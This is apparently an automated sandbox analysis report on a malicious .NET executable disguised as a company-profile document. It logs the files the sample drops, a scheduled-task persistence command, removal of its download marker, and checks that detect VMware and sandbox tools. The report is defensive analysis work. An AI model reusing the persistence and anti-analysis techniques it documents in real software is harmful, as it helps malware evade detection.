Source: 8.0.dhcpmon.exe.b50000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.dhcpmon.exe.960000.1.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B65EA push edx; retf	0_2_090B65EB
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F65EA push edx; retf	8_2_071F65EB
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_013B9EA8 push eax; ret	14_2_013B9EBE

Source: initial sample	Static PE information: section name: .text entropy: 7.48398522287
Source: initial sample	Static PE information: section name: .text entropy: 7.48398522287
Source: initial sample	Static PE information: section name: .text entropy: 7.48398522287

Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	File created: C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe			Jump to dropped file
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File opened: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.672967750.0000000002EA8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.723420263.0000000002EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.2e56bb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.2ed6b58.1.raw.unpack, type: UNPACKEDPE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Window / User API: threadDelayed 5565	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Window / User API: threadDelayed 3776	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Window / User API: foregroundWindowGot 596	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Window / User API: foregroundWindowGot 742	Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe TID: 7056	Thread sleep time: -101197s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe TID: 7080	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe TID: 1368	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6768	Thread sleep time: -99091s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6876	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4292	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: dhcpmon.exe, 00000008.00000003.715656595.000000000137A000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c9
Source: dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Process information queried: ProcessInformation

Jump to behavior

